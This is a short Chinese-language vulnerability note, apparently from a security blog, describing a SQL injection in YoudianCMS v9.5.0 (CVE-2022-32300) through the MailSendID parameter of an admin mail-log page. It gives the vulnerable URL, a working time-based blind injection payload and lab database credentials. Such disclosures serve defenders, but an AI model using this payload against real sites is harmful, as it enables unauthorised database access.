描述:
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。
通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。
数据库:root/root 数据库名:youdian
易受攻击的URL为:/index.php/Admin/mail/viewLog?MailSendID=1
%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))A)
参考文章:YoudianCMS v9.5.0 SQL 注入漏洞CVE-2022-32300-Linux实验室
发表评论 取消回复